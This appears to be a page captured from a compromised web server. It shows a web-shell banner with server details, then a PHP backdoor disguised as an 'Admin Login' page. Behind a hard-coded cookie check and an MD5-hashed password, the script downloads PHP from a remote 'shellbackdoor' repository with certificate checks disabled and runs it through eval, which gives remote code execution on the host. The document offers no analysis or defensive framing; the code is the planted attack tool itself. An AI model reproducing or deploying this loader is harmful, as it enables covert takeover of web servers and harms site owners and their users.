Server : Apache System : Linux h2web276 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1+deb9u1~deb8u1 (2020-06-09) x86_64 User : uid183121 ( 183121) PHP Version : 8.0.30 Disable Function : passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec Directory : /home/clients/35966debc7d0d13be0a39d90b50635f3/sites/conference.vaxjustice.org/ |
Upload File : |
<?php // Function to check if the user is logged in based on the presence of a valid cookie function is_logged_in() { return isset($_COOKIE['user_id']) && $_COOKIE['user_id'] === 'user123'; // Ganti 'user123' dengan nilai yang sesuai } // Check if the user is logged in before executing the content if (is_logged_in()) { // Function to get URL content (similar to your previous code) function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } $a = geturlsinfo('https://raw.githubusercontent.com/Outsiders289/shellbackdoor/main/lo.php'); eval('?>' . $a); } else { // Display login form if not logged in if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '9c5b3082eae2c54711bb99f361f58073'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, set a cookie to indicate login setcookie('user_id', 'user123', time() + 3600, '/'); // Ganti 'user123' dengan nilai yang sesuai } else { // Password is incorrect echo "Incorrect password. Please try again."; } } ?> <!DOCTYPE html> <html> <head> <title>Admin Login</title> </head> <body> <form method="POST" action=""> <label for="password">Admin:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>